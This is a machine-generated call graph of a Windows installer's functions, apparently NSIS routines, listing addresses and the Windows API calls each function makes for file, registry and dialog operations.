3737 402c41 CreateDialogParamA ShowWindow 3732->3737 3738 402c64 3732->3738 3736 4060ce 2 API calls 3733->3736 3734->3735 3735->3619 3739 402c31 3736->3739 3737->3738 3738->3619 3739->3619 3740->3627 3741->3626 3743 403956 3742->3743 3753 405c5b wsprintfA 3743->3753 3745 4039c7 3746 405d1f 18 API calls 3745->3746 3747 4039d3 SetWindowTextA 3746->3747 3748 403702 3747->3748 3749 4039ef 3747->3749 3748->3649 3749->3748 3750 405d1f 18 API calls 3749->3750 3750->3749 3751->3646 3752->3651 3753->3745 3754->3695 3757 4035f6 3755->3757 3756 4035c0 3759 40559f 3756->3759 3757->3756 3758 4035fb FreeLibrary GlobalFree 3757->3758 3758->3756 3758->3758 3760 40585d 18 API calls 3759->3760 3761 4055bf 3760->3761 3762 4055c7 DeleteFileA 3761->3762 3763 4055de 3761->3763 3792 4033da OleUninitialize 3762->3792 3765 40570c 3763->3765 3796 405cfd lstrcpynA 3763->3796 3771 406001 2 API calls 3765->3771 3765->3792 3766 405604 3767 405617 3766->3767 3768 40560a lstrcatA 3766->3768 3770 4057b6 2 API calls 3767->3770 3769 40561d 3768->3769 3772 40562b lstrcatA 3769->3772 3774 405636 lstrlenA FindFirstFileA 3769->3774 3770->3769 3773 405730 3771->3773 3772->3774 3775 40576f 3 API calls 3773->3775 3773->3792 3774->3765 3782 40565a 3774->3782 3776 40573a 3775->3776 3778 405557 5 API calls 3776->3778 3777 40579a CharNextA 3777->3782 3779 405746 3778->3779 3780 405760 3779->3780 3781 40574a 3779->3781 3785 404f16 25 API calls 3780->3785 3787 404f16 25 API calls 3781->3787 3781->3792 3782->3777 3783 4056eb FindNextFileA 3782->3783 3791 40559f 62 API calls 3782->3791 3793 404f16 25 API calls 3782->3793 3794 404f16 25 API calls 3782->3794 3795 405bb8 38 API calls 3782->3795 3797 405cfd lstrcpynA 3782->3797 3798 405557 3782->3798 3783->3782 3786 405703 FindClose 3783->3786 3785->3792 3786->3765 3788 405757 3787->3788 3789 405bb8 38 API calls 3788->3789 3789->3792 3791->3782 3792->3549 3792->3550 3793->3783 3794->3782 3795->3782 3796->3766 3797->3782 3799 40594b 2 API calls 3798->3799 3800 405563 3799->3800 3801 405584 3800->3801 3802 405572 RemoveDirectoryA 3800->3802 3803 40557a DeleteFileA 3800->3803 3801->3782 3804 405580 3802->3804 3803->3804 3804->3801 3805 405590 SetFileAttributesA 3804->3805 3805->3801 3969 4042d9 3970 4042e9 3969->3970 3971 40430f 3969->3971 3973 403ee2 19 API calls 3970->3973 3972 403f49 8 API calls 3971->3972 3974 40431b 3972->3974 3975 4042f6 SetDlgItemTextA 3973->3975 3975->3971 3976 40155b 3977 402877 3976->3977 3980 405c5b wsprintfA 3977->3980 3979 40287c 3980->3979 3981 40255c 3982 402a1d 18 API calls 3981->3982 3987 402566 3982->3987 3983 4025d0 3984 4059e8 ReadFile 3984->3987 3985 4025d2 3990 405c5b wsprintfA 3985->3990 3986 4025e2 3986->3983 3989 4025f8 SetFilePointer 3986->3989 3987->3983 3987->3984 3987->3985 3987->3986 3989->3983 3990->3983 3806 40205e 3807 402a3a 18 API calls 3806->3807 3808 402065 3807->3808 3809 402a3a 18 API calls 3808->3809 3810 40206f 3809->3810 3811 402a3a 18 API calls 3810->3811 3812 402079 3811->3812 3813 402a3a 18 API calls 3812->3813 3814 402083 3813->3814 3815 402a3a 18 API calls 3814->3815 3816 40208d 3815->3816 3817 4020cc CoCreateInstance 3816->3817 3818 402a3a 18 API calls 3816->3818 3821 4020eb 3817->3821 3823 402193 3817->3823 3818->3817 3819 401423 25 API calls 3820 4021c9 3819->3820 3822 402173 MultiByteToWideChar 3821->3822 3821->3823 3822->3823 3823->3819 3823->3820 3991 40265e 3992 402664 3991->3992 3993 402668 FindNextFileA 3992->3993 3996 40267a 3992->3996 3994 4026b9 3993->3994 3993->3996 3997 405cfd lstrcpynA 3994->3997 3997->3996 3998 401cde GetDlgItem GetClientRect 3999 402a3a 18 API calls 3998->3999 4000 401d0e LoadImageA SendMessageA 3999->4000 4001 401d2c DeleteObject 4000->4001 4002 4028cf 4000->4002 4001->4002 2997 401662 3011 402a3a 2997->3011 3000 402a3a 18 API calls 3001 401672 3000->3001 3002 402a3a 18 API calls 3001->3002 3003 40167b MoveFileA 3002->3003 3004 401687 3003->3004 3005 40168e 3003->3005 3024 401423 3004->3024 3009 4021c9 3005->3009 3017 406001 FindFirstFileA 3005->3017 3012 402a46 3011->3012 3027 405d1f 3012->3027 3014 401669 3014->3000 3018 406017 FindClose 3017->3018 3019 40169d 3017->3019 3018->3019 3019->3009 3020 405bb8 MoveFileExA 3019->3020 3021 405bd9 3020->3021 3022 405bcc 3020->3022 3021->3004 3066 405a46 lstrcpyA 3022->3066 3104 404f16 3024->3104 3042 405d2c 3027->3042 3028 405f4f 3029 402a67 3028->3029 3061 405cfd lstrcpynA 3028->3061 3029->3014 3045 405f68 3029->3045 3031 405dcd GetVersion 3031->3042 3032 405f26 lstrlenA 3032->3042 3034 405d1f 10 API calls 3034->3032 3037 405e45 GetSystemDirectoryA 3037->3042 3038 405e58 GetWindowsDirectoryA 3038->3042 3039 405f68 5 API calls 3039->3042 3040 405d1f 10 API calls 3040->3042 3041 405ecf lstrcatA 3041->3042 3042->3028 3042->3031 3042->3032 3042->3034 3042->3037 3042->3038 3042->3039 3042->3040 3042->3041 3043 405e8c SHGetSpecialFolderLocation 3042->3043 3054 405be4 RegOpenKeyExA 3042->3054 3059 405c5b wsprintfA 3042->3059 3060 405cfd lstrcpynA 3042->3060 3043->3042 3044 405ea4 SHGetPathFromIDListA CoTaskMemFree 3043->3044 3044->3042 3051 405f74 3045->3051 3046 405fe0 CharPrevA 3047 405fdc 3046->3047 3047->3046 3049 405ffb 3047->3049 3048 405fd1 CharNextA 3048->3047 3048->3051 3049->3014 3051->3047 3051->3048 3052 405fbf CharNextA 3051->3052 3053 405fcc CharNextA 3051->3053 3062 40579a 3051->3062 3052->3051 3053->3048 3055 405c55 3054->3055 3056 405c17 RegQueryValueExA 3054->3056 3055->3042 3057 405c38 RegCloseKey 3056->3057 3057->3055 3059->3042 3060->3042 3061->3029 3063 4057a0 3062->3063 3064 4057b3 3063->3064 3065 4057a6 CharNextA 3063->3065 3064->3051 3065->3063 3067 405a94 GetShortPathNameA 3066->3067 3068 405a6e 3066->3068 3070 405bb3 3067->3070 3071 405aa9 3067->3071 3093 405970 GetFileAttributesA CreateFileA 3068->3093 3070->3021 3071->3070 3073 405ab1 wsprintfA 3071->3073 3072 405a78 CloseHandle GetShortPathNameA 3072->3070 3074 405a8c 3072->3074 3075 405d1f 18 API calls 3073->3075 3074->3067 3074->3070 3076 405ad9 3075->3076 3094 405970 GetFileAttributesA CreateFileA 3076->3094 3078 405ae6 3078->3070 3079 405af5 GetFileSize GlobalAlloc 3078->3079 3080 405b17 3079->3080 3081 405bac CloseHandle 3079->3081 3095 4059e8 ReadFile 3080->3095 3081->3070 3086 405b36 lstrcpyA 3089 405b58 3086->3089 3087 405b4a 3088 4058d5 4 API calls 3087->3088 3088->3089 3090 405b8f SetFilePointer 3089->3090 3102 405a17 WriteFile 3090->3102 3093->3072 3094->3078 3096 405a06 3095->3096 3096->3081 3097 4058d5 lstrlenA 3096->3097 3098 405916 lstrlenA 3097->3098 3099 40591e 3098->3099 3100 4058ef lstrcmpiA 3098->3100 3099->3086 3099->3087 3100->3099 3101 40590d CharNextA 3100->3101 3101->3098 3103 405a35 GlobalFree 3102->3103 3103->3081 3105 404f31 3104->3105 3114 401431 3104->3114 3106 404f4e lstrlenA 3105->3106 3107 405d1f 18 API calls 3105->3107 3108 404f77 3106->3108 3109 404f5c lstrlenA 3106->3109 3107->3106 3111 404f8a 3108->3111 3112 404f7d SetWindowTextA 3108->3112 3110 404f6e lstrcatA 3109->3110 3109->3114 3110->3108 3113 404f90 SendMessageA SendMessageA SendMessageA 3111->3113 3111->3114 3112->3111 3113->3114 3114->3009 3149 402364 3150 40236a 3149->3150 3151 402a3a 18 API calls 3150->3151 3152 40237c 3151->3152 3153 402a3a 18 API calls 3152->3153 3154 402386 RegCreateKeyExA 3153->3154 3155 4023b0 3154->3155 3156 4028cf 3154->3156 3157 4023c8 3155->3157 3158 402a3a 18 API calls 3155->3158 3159 4023d4 3157->3159 3187 402a1d 3157->3187 3161 4023c1 lstrlenA 3158->3161 3160 4023ef RegSetValueExA 3159->3160 3166 402e9f 3159->3166 3164 402405 RegCloseKey 3160->3164 3161->3157 3164->3156 3168 402eb5 3166->3168 3167 402ee0 3190 40307b 3167->3190 3168->3167 3201 403091 SetFilePointer 3168->3201 3172 40301b 3174 40301f 3172->3174 3179 403037 3172->3179 3173 402efd GetTickCount 3185 402f10 3173->3185 3176 40307b ReadFile 3174->3176 3175 403005 3175->3160 3176->3175 3177 40307b ReadFile 3177->3179 3178 40307b ReadFile 3178->3185 3179->3175 3179->3177 3180 405a17 WriteFile 3179->3180 3180->3179 3182 402f76 GetTickCount 3182->3185 3183 402f9f MulDiv wsprintfA 3184 404f16 25 API calls 3183->3184 3184->3185 3185->3175 3185->3178 3185->3182 3185->3183 3186 405a17 WriteFile 3185->3186 3193 406195 3185->3193 3186->3185 3188 405d1f 18 API calls 3187->3188 3189 402a31 3188->3189 3189->3159 3191 4059e8 ReadFile 3190->3191 3192 402eeb 3191->3192 3192->3172 3192->3173 3192->3175 3194 4061ba 3193->3194 3195 4061c2 3193->3195 3194->3185 3195->3194 3196 406252 GlobalAlloc 3195->3196 3197 406249 GlobalFree 3195->3197 3198 4062c0 GlobalFree 3195->3198 3199 4062c9 GlobalAlloc 3195->3199 3196->3194 3200 406266 3196->3200 3197->3196 3198->3199 3199->3194 3199->3195 3200->3195 3201->3167 3202 401567 3203 401577 ShowWindow 3202->3203 3204 40157e 3202->3204 3203->3204 3205 40158c ShowWindow 3204->3205 3206 4028cf 3204->3206 3205->3206 3217 401dea 3218 402a3a 18 API calls 3217->3218 3219 401df0 3218->3219 3220 402a3a 18 API calls 3219->3220 3221 401df9 3220->3221 3222 402a3a 18 API calls 3221->3222 3223 401e02 3222->3223 3224 402a3a 18 API calls 3223->3224 3225 401e0b 3224->3225 3226 401423 25 API calls 3225->3226 3227 401e12 ShellExecuteA 3226->3227 3228 401e3f 3227->3228 4010 401eee 4011 402a3a 18 API calls 4010->4011 4012 401ef5 4011->4012 4013 406092 5 API calls 4012->4013 4014 401f04 4013->4014 4015 401f1c GlobalAlloc 4014->4015 4016 401f84 4014->4016 4015->4016 4017 401f30 4015->4017 4018 406092 5 API calls 4017->4018 4019 401f37 4018->4019 4020 406092 5 API calls 4019->4020 4021 401f41 4020->4021 4021->4016 4025 405c5b wsprintfA 4021->4025 4023 401f78 4026 405c5b wsprintfA 4023->4026 4025->4023 4026->4016 4027 4014f0 SetForegroundWindow 4028 4028cf 4027->4028 4029 404671 4030 404681 4029->4030 4031 40469d 4029->4031 4040 4054d7 GetDlgItemTextA 4030->4040 4033 4046d0 4031->4033 4034 4046a3 SHGetPathFromIDListA 4031->4034 4036 4046ba SendMessageA 4034->4036 4037 4046b3 4034->4037 4035 40468e SendMessageA 4035->4031 4036->4033 4038 40140b 2 API calls 4037->4038 4038->4036 4040->4035 4046 4018f5 4047 40192c 4046->4047 4048 402a3a 18 API calls 4047->4048 4049 401931 4048->4049 4050 40559f 69 API calls 4049->4050 4051 40193a 4050->4051 4052 403ff6 lstrcpynA lstrlenA 4053 4024f7 4054 402a3a 18 API calls 4053->4054 4055 4024fe 4054->4055 4058 405970 GetFileAttributesA CreateFileA 4055->4058 4057 40250a 4058->4057 4059 4018f8 4060 402a3a 18 API calls 4059->4060 4061 4018ff 4060->4061 4062 4054f3 MessageBoxIndirectA 4061->4062 4063 401908 4062->4063 4078 4014fe 4079 401506 4078->4079 4081 401519 4078->4081 4080 402a1d 18 API calls 4079->4080 4080->4081 4082 402b7f 4083 402b8e SetTimer 4082->4083 4086 402ba7 4082->4086 4083->4086 4084 402bfc 4085 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4085->4084 4086->4084 4086->4085 4087 401000 4088 401037 BeginPaint GetClientRect 4087->4088 4089 40100c DefWindowProcA 4087->4089 4091 4010f3 4088->4091 4092 401179 4089->4092 4093 401073 CreateBrushIndirect FillRect DeleteObject 4091->4093 4094 4010fc 4091->4094 4093->4091 4095 401102 CreateFontIndirectA 4094->4095 4096 401167 EndPaint 4094->4096 4095->4096 4097 401112 6 API calls 4095->4097 4096->4092 4097->4096 4105 401b02 4106 402a3a 18 API calls 4105->4106 4107 401b09 4106->4107 4108 402a1d 18 API calls 4107->4108 4109 401b12 wsprintfA 4108->4109 4110 4028cf 4109->4110 4111 402482 4112 402b44 19 API calls 4111->4112 4113 40248c 4112->4113 4114 402a1d 18 API calls 4113->4114 4115 402495 4114->4115 4116 4024b8 RegEnumValueA 4115->4116 4117 4024ac RegEnumKeyA 4115->4117 4118 4026a6 4115->4118 4116->4118 4119 4024d1 RegCloseKey 4116->4119 4117->4119 4119->4118 3115 402283 3116 402291 3115->3116 3117 40228b 3115->3117 3119 402a3a 18 API calls 3116->3119 3121 4022a1 3116->3121 3118 402a3a 18 API calls 3117->3118 3118->3116 3119->3121 3120 402a3a 18 API calls 3124 4022b8 WritePrivateProfileStringA 3120->3124 3122 402a3a 18 API calls 3121->3122 3123 4022af 3121->3123 3122->3123 3123->3120 4121 401a03 4122 402a3a 18 API calls 4121->4122 4123 401a0c ExpandEnvironmentStringsA 4122->4123 4124 401a20 4123->4124 4126 401a33 4123->4126 4125 401a25 lstrcmpA 4124->4125 4124->4126 4125->4126 3207 402688 3208 402a3a 18 API calls 3207->3208 3209 40268f FindFirstFileA 3208->3209 3210 4026b2 3209->3210 3211 4026a2 3209->3211 3212 4026b9 3210->3212 3215 405c5b wsprintfA 3210->3215 3216 405cfd lstrcpynA 3212->3216 3215->3212 3216->3211 4127 402308 4128 402338 4127->4128 4129 40230d 4127->4129 4130 402a3a 18 API calls 4128->4130 4131 402b44 19 API calls 4129->4131 4132 40233f 4130->4132 4133 402314 4131->4133 4138 402a7a RegOpenKeyExA 4132->4138 4134 402a3a 18 API calls 4133->4134 4137 402355 4133->4137 4135 402325 RegDeleteValueA RegCloseKey 4134->4135 4135->4137 4145 402af1 4138->4145 4146 402aa5 4138->4146 4139 402acb RegEnumKeyA 4140 402add RegCloseKey 4139->4140 4139->4146 4142 406092 5 API calls 4140->4142 4141 402b02 RegCloseKey 4141->4145 4144 402aed 4142->4144 4143 402a7a 5 API calls 4143->4146 4144->4145 4147 402b1d RegDeleteKeyA 4144->4147 4145->4137 4146->4139 4146->4140 4146->4141 4146->4143 4147->4145 4148 404e8a 4149 404e9a 4148->4149 4150 404eae 4148->4150 4152 404ea0 4149->4152 4153 404ef7 4149->4153 4151 404eb6 IsWindowVisible 4150->4151 4159 404ecd 4150->4159 4151->4153 4154 404ec3 4151->4154 4156 403f2e SendMessageA 4152->4156 4155 404efc CallWindowProcA 4153->4155 4161 4047e1 SendMessageA 4154->4161 4157 404eaa 4155->4157 4156->4157 4159->4155 4166 404861 4159->4166 4162 404840 SendMessageA 4161->4162 4163 404804 GetMessagePos ScreenToClient SendMessageA 4161->4163 4164 404838 4162->4164 4163->4164 4165 40483d 4163->4165 4164->4159 4165->4162 4175 405cfd lstrcpynA 4166->4175 4168 404874 4176 405c5b wsprintfA 4168->4176 4170 40487e 4171 40140b 2 API calls 4170->4171 4172 404887 4171->4172 4177 405cfd lstrcpynA 4172->4177 4174 40488e 4174->4153 4175->4168 4176->4170 4177->4174 4178 401c8a 4179 402a1d 18 API calls 4178->4179 4180 401c90 IsWindow 4179->4180 4181 4019f3 4180->4181 3229 403a0f 3230 403b62 3229->3230 3231 403a27 3229->3231 3233 403bb3 3230->3233 3234 403b73 GetDlgItem GetDlgItem 3230->3234 3231->3230 3232 403a33 3231->3232 3235 403a51 3232->3235 3236 403a3e SetWindowPos 3232->3236 3238 403c0d 3233->3238 3246 401389 2 API calls 3233->3246 3237 403ee2 19 API calls 3234->3237 3240 403a56 ShowWindow 3235->3240 3241 403a6e 3235->3241 3236->3235 3242 403b9d SetClassLongA 3237->3242 3247 403b5d 3238->3247 3299 403f2e 3238->3299 3240->3241 3243 403a90 3241->3243 3244 403a76 DestroyWindow 3241->3244 3245 40140b 2 API calls 3242->3245 3249 403a95 SetWindowLongA 3243->3249 3250 403aa6 3243->3250 3248 403e6b 3244->3248 3245->3233 3251 403be5 3246->3251 3248->3247 3258 403e9c ShowWindow 3248->3258 3249->3247 3254 403ab2 GetDlgItem 3250->3254 3255 403b4f 3250->3255 3251->3238 3256 403be9 SendMessageA 3251->3256 3252 40140b 2 API calls 3270 403c1f 3252->3270 3253 403e6d DestroyWindow EndDialog 3253->3248 3259 403ae2 3254->3259 3260 403ac5 SendMessageA IsWindowEnabled 3254->3260 3318 403f49 3255->3318 3256->3247 3258->3247 3262 403aef 3259->3262 3263 403b36 SendMessageA 3259->3263 3264 403b02 3259->3264 3273 403ae7 3259->3273 3260->3247 3260->3259 3261 405d1f 18 API calls 3261->3270 3262->3263 3262->3273 3263->3255 3267 403b0a 3264->3267 3268 403b1f 3264->3268 3266 403ee2 19 API calls 3266->3270 3312 40140b 3267->3312 3272 40140b 2 API calls 3268->3272 3269 403b1d 3269->3255 3270->3247 3270->3252 3270->3253 3270->3261 3270->3266 3290 403dad DestroyWindow 3270->3290 3302 403ee2 3270->3302 3274 403b26 3272->3274 3315 403ebb 3273->3315 3274->3255 3274->3273 3276 403c9a GetDlgItem 3277 403cb7 ShowWindow KiUserCallbackDispatcher 3276->3277 3278 403caf 3276->3278 3305 403f04 KiUserCallbackDispatcher 3277->3305 3278->3277 3280 403ce1 EnableWindow 3283 403cf5 3280->3283 3281 403cfa GetSystemMenu EnableMenuItem SendMessageA 3282 403d2a SendMessageA 3281->3282 3281->3283 3282->3283 3283->3281 3306 403f17 SendMessageA 3283->3306 3307 405cfd lstrcpynA 3283->3307 3286 403d58 lstrlenA 3287 405d1f 18 API calls 3286->3287 3288 403d69 SetWindowTextA 3287->3288 3308 401389 3288->3308 3290->3248 3291 403dc7 CreateDialogParamA 3290->3291 3291->3248 3292 403dfa 3291->3292 3293 403ee2 19 API calls 3292->3293 3294 403e05 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3293->3294 3295 401389 2 API calls 3294->3295 3296 403e4b 3295->3296 3296->3247 3297 403e53 ShowWindow 3296->3297 3298 403f2e SendMessageA 3297->3298 3298->3248 3300 403f46 3299->3300 3301 403f37 SendMessageA 3299->3301 3300->3270 3301->3300 3303 405d1f 18 API calls 3302->3303 3304 403eed SetDlgItemTextA 3303->3304 3304->3276 3305->3280 3306->3283 3307->3286 3310 401390 3308->3310 3309 4013fe 3309->3270 3310->3309 3311 4013cb MulDiv SendMessageA 3310->3311 3311->3310 3313 401389 2 API calls 3312->3313 3314 401420 3313->3314 3314->3273 3316 403ec2 3315->3316 3317 403ec8 SendMessageA 3315->3317 3316->3317 3317->3269 3319 403f61 GetWindowLongA 3318->3319 3329 403fea 3318->3329 3320 403f72 3319->3320 3319->3329 3321 403f81 GetSysColor 3320->3321 3322 403f84 3320->3322 3321->3322 3323 403f94 SetBkMode 3322->3323 3324 403f8a SetTextColor 3322->3324 3325 403fb2 3323->3325 3326 403fac GetSysColor 3323->3326 3324->3323 3327 403fc3 3325->3327 3328 403fb9 SetBkColor 3325->3328 3326->3325 3327->3329 3330 403fd6 DeleteObject 3327->3330 3331 403fdd CreateBrushIndirect 3327->3331 3328->3327 3329->3247 3330->3331 3331->3329 3332 402410 3343 402b44 3332->3343 3334 40241a 3335 402a3a 18 API calls 3334->3335 3336 402423 3335->3336 3337 40242d RegQueryValueExA 3336->3337 3342 4026a6 3336->3342 3338 402453 RegCloseKey 3337->3338 3339 40244d 3337->3339 3338->3342 3339->3338 3347 405c5b wsprintfA 3339->3347 3344 402a3a 18 API calls 3343->3344 3345 402b5d 3344->3345 3346 402b6b RegOpenKeyExA 3345->3346 3346->3334 3347->3338 4182 401490 4183 404f16 25 API calls 4182->4183 4184 401497 4183->4184 4185 401f90 4186 401fa2 4185->4186 4187 402050 4185->4187 4188 402a3a 18 API calls 4186->4188 4190 401423 25 API calls 4187->4190 4189 401fa9 4188->4189 4191 402a3a 18 API calls 4189->4191 4196 4021c9 4190->4196 4192 401fb2 4191->4192 4193 401fc7 LoadLibraryExA 4192->4193 4194 401fba GetModuleHandleA 4192->4194 4193->4187 4195 401fd7 GetProcAddress 4193->4195 4194->4193 4194->4195 4197 402023 4195->4197 4198 401fe6 4195->4198 4199 404f16 25 API calls 4197->4199 4200 401423 25 API calls 4198->4200 4201 401ff6 4198->4201 4199->4201 4200->4201 4201->4196 4202 402044 FreeLibrary 4201->4202 4202->4196 4210 404893 GetDlgItem GetDlgItem 4211 4048e5 7 API calls 4210->4211 4218 404afd 4210->4218 4212 404988 DeleteObject 4211->4212 4213 40497b SendMessageA 4211->4213 4214 404991 4212->4214 4213->4212 4215 4049c8 4214->4215 4217 405d1f 18 API calls 4214->4217 4219 403ee2 19 API calls 4215->4219 4216 404be1 4220 404c8d 4216->4220 4231 404c3a SendMessageA 4216->4231 4250 404af0 4216->4250 4222 4049aa SendMessageA SendMessageA 4217->4222 4218->4216 4221 404b6e 4218->4221 4229 4047e1 5 API calls 4218->4229 4225 4049dc 4219->4225 4223 404c97 SendMessageA 4220->4223 4224 404c9f 4220->4224 4221->4216 4227 404bd3 SendMessageA 4221->4227 4222->4214 4223->4224 4228 404cc8 4224->4228 4233 404cb1 ImageList_Destroy 4224->4233 4234 404cb8 4224->4234 4230 403ee2 19 API calls 4225->4230 4226 403f49 8 API calls 4232 404e83 4226->4232 4227->4216 4236 404e37 4228->4236 4253 404861 4 API calls 4228->4253 4257 404d03 4228->4257 4229->4221 4235 4049ea 4230->4235 4237 404c4f SendMessageA 4231->4237 4231->4250 4233->4234 4234->4228 4238 404cc1 GlobalFree 4234->4238 4239 404abe GetWindowLongA SetWindowLongA 4235->4239 4245 404ab8 4235->4245 4248 404a39 SendMessageA 4235->4248 4251 404a75 SendMessageA 4235->4251 4252 404a86 SendMessageA 4235->4252 4242 404e49 ShowWindow GetDlgItem ShowWindow 4236->4242 4236->4250 4241 404c62 4237->4241 4238->4228 4240 404ad7 4239->4240 4243 404af5 4240->4243 4244 404add ShowWindow 4240->4244 4249 404c73 SendMessageA 4241->4249 4242->4250 4262 403f17 SendMessageA 4243->4262 4261 403f17 SendMessageA 4244->4261 4245->4239 4245->4240 4248->4235 4249->4220 4250->4226 4251->4235 4252->4235 4253->4257 4254 404e0d InvalidateRect 4254->4236 4255 404e23 4254->4255 4263 40479c 4255->4263 4256 404d31 SendMessageA 4260 404d47 4256->4260 4257->4256 4257->4260 4259 404dbb SendMessageA SendMessageA 4259->4260 4260->4254 4260->4259 4261->4250 4262->4218 4266 4046d7 4263->4266 4265 4047b1 4265->4236 4267 4046ed 4266->4267 4268 405d1f 18 API calls 4267->4268 4269 404751 4268->4269 4270 405d1f 18 API calls 4269->4270 4271 40475c 4270->4271 4272 405d1f 18 API calls 4271->4272 4273 404772 lstrlenA wsprintfA SetDlgItemTextA 4272->4273 4273->4265 3501 401595 3502 402a3a 18 API calls 3501->3502 3503 40159c SetFileAttributesA 3502->3503 3504 4015ae 3503->3504 4274 402616 4275 40261d 4274->4275 4278 40287c 4274->4278 4276 402a1d 18 API calls 4275->4276 4277 402628 4276->4277 4279 40262f SetFilePointer 4277->4279 4279->4278 4280 40263f 4279->4280 4282 405c5b wsprintfA 4280->4282 4282->4278 4283 401717 4284 402a3a 18 API calls 4283->4284 4285 40171e SearchPathA 4284->4285 4286 401739 4285->4286 4287 402519 4288 40252e 4287->4288 4289 40251e 4287->4289 4291 402a3a 18 API calls 4288->4291 4290 402a1d 18 API calls 4289->4290 4293 402527 4290->4293 4292 402535 lstrlenA 4291->4292 4292->4293 4294 402557 4293->4294 4295 405a17 WriteFile 4293->4295 4295->4294 4296 40149d 4297 4014ab PostQuitMessage 4296->4297 4298 40226e 4296->4298 4297->4298 4299 404320 4300 40434c 4299->4300 4301 40435d 4299->4301 4360 4054d7 GetDlgItemTextA 4300->4360 4303 404369 GetDlgItem 4301->4303 4310 4043c8 4301->4310 4305 40437d 4303->4305 4304 404357 4307 405f68 5 API calls 4304->4307 4308 404391 SetWindowTextA 4305->4308 4313 405808 4 API calls 4305->4313 4306 4044ac 4309 404656 4306->4309 4362 4054d7 GetDlgItemTextA 4306->4362 4307->4301 4314 403ee2 19 API calls 4308->4314 4312 403f49 8 API calls 4309->4312 4310->4306 4310->4309 4315 405d1f 18 API calls 4310->4315 4320 40466a 4312->4320 4321 404387 4313->4321 4317 4043ad 4314->4317 4318 40443c SHBrowseForFolderA 4315->4318 4316 4044dc 4319 40585d 18 API calls 4316->4319 4322 403ee2 19 API calls 4317->4322 4318->4306 4323 404454 CoTaskMemFree 4318->4323 4324 4044e2 4319->4324 4321->4308 4327 40576f 3 API calls 4321->4327 4325 4043bb 4322->4325 4326 40576f 3 API calls 4323->4326 4363 405cfd lstrcpynA 4324->4363 4361 403f17 SendMessageA 4325->4361 4329 404461 4326->4329 4327->4308 4332 404498 SetDlgItemTextA 4329->4332 4336 405d1f 18 API calls 4329->4336 4331 4043c1 4334 406092 5 API calls 4331->4334 4332->4306 4333 4044f9 4335 406092 5 API calls 4333->4335 4334->4310 4343 404500 4335->4343 4337 404480 lstrcmpiA 4336->4337 4337->4332 4340 404491 lstrcatA 4337->4340 4338 40453c 4364 405cfd lstrcpynA 4338->4364 4340->4332 4341 404543 4342 405808 4 API calls 4341->4342 4344 404549 GetDiskFreeSpaceA 4342->4344 4343->4338 4347 4057b6 2 API calls 4343->4347 4348 404594 4343->4348 4346 40456d MulDiv 4344->4346 4344->4348 4346->4348 4347->4343 4349 40479c 21 API calls 4348->4349 4357 404605 4348->4357 4351 4045f2 4349->4351 4350 404628 4365 403f04 KiUserCallbackDispatcher 4350->4365 4354 404607 SetDlgItemTextA 4351->4354 4355 4045f7 4351->4355 4352 40140b 2 API calls 4352->4350 4354->4357 4356 4046d7 21 API calls 4355->4356 4356->4357 4357->4350 4357->4352 4358 404644 4358->4309 4366 4042b5 4358->4366 4360->4304 4361->4331 4362->4316 4363->4333 4364->4341 4365->4358 4367 4042c3 4366->4367 4368 4042c8 SendMessageA 4366->4368 4367->4368 4368->4309 4369 401b23 4370 401b30 4369->4370 4371 401b74 4369->4371 4374 401bb8 4370->4374 4377 401b47 4370->4377 4372 401b78 4371->4372 4373 401b9d GlobalAlloc 4371->4373 4384 40226e 4372->4384 4390 405cfd lstrcpynA 4372->4390 4376 405d1f 18 API calls 4373->4376 4375 405d1f 18 API calls 4374->4375 4374->4384 4378 402268 4375->4378 4376->4374 4388 405cfd lstrcpynA 4377->4388 4382 4054f3 MessageBoxIndirectA 4378->4382 4381 401b8a GlobalFree 4381->4384 4382->4384 4383 401b56 4389 405cfd lstrcpynA 4383->4389 4386 401b65 4391 405cfd lstrcpynA 4386->4391 4388->4383 4389->4386 4390->4381 4391->4384 4392 401ca7 4393 402a1d 18 API calls 4392->4393 4394 401cae 4393->4394 4395 402a1d 18 API calls 4394->4395 4396 401cb6 GetDlgItem 4395->4396 4397 402513 4396->4397 4411 4028aa SendMessageA 4412 4028c4 InvalidateRect 4411->4412 4413 4028cf 4411->4413 4412->4413 4414 40402b 4415 404041 4414->4415 4422 40414d 4414->4422 4419 403ee2 19 API calls 4415->4419 4416 4041bc 4417 404290 4416->4417 4418 4041c6 GetDlgItem 4416->4418 4424 403f49 8 API calls 4417->4424 4420 4041dc 4418->4420 4421 40424e 4418->4421 4423 404097 4419->4423 4420->4421 4428 404202 6 API calls 4420->4428 4421->4417 4429 404260 4421->4429 4422->4416 4422->4417 4426 404191 GetDlgItem SendMessageA 4422->4426 4425 403ee2 19 API calls 4423->4425 4436 40428b 4424->4436 4427 4040a4 CheckDlgButton 4425->4427 4445 403f04 KiUserCallbackDispatcher 4426->4445 4443 403f04 KiUserCallbackDispatcher 4427->4443 4428->4421 4432 404266 SendMessageA 4429->4432 4433 404277 4429->4433 4432->4433 4433->4436 4437 40427d SendMessageA 4433->4437 4434 4041b7 4438 4042b5 SendMessageA 4434->4438 4435 4040c2 GetDlgItem 4444 403f17 SendMessageA 4435->4444 4437->4436 4438->4416 4440 4040d8 SendMessageA 4441 4040f6 GetSysColor 4440->4441 4442 4040ff SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4440->4442 4441->4442 4442->4436 4443->4435 4444->4440 4445->4434 3399 4015b3 3400 402a3a 18 API calls 3399->3400 3401 4015ba 3400->3401 3419 405808 CharNextA CharNextA 3401->3419 3403 4015c2 3404 40161c 3403->3404 3405 40579a CharNextA 3403->3405 3415 4015eb 3403->3415 3417 401604 GetFileAttributesA 3403->3417 3426 405476 3403->3426 3434 405459 CreateDirectoryA 3403->3434 3406 401621 3404->3406 3407 40164a 3404->3407 3405->3403 3408 401423 25 API calls 3406->3408 3410 401423 25 API calls 3407->3410 3409 401628 3408->3409 3425 405cfd lstrcpynA 3409->3425 3416 401642 3410->3416 3414 401633 SetCurrentDirectoryA 3414->3416 3415->3403 3429 4053dc CreateDirectoryA 3415->3429 3417->3403 3420 405833 3419->3420 3421 405823 3419->3421 3423 40579a CharNextA 3420->3423 3424 405853 3420->3424 3421->3420 3422 40582e CharNextA 3421->3422 3422->3424 3423->3420 3424->3403 3425->3414 3437 406092 GetModuleHandleA 3426->3437 3430 405429 3429->3430 3431 40542d GetLastError 3429->3431 3430->3415 3431->3430 3432 40543c SetFileSecurityA 3431->3432 3432->3430 3433 405452 GetLastError 3432->3433 3433->3430 3435 405469 3434->3435 3436 40546d 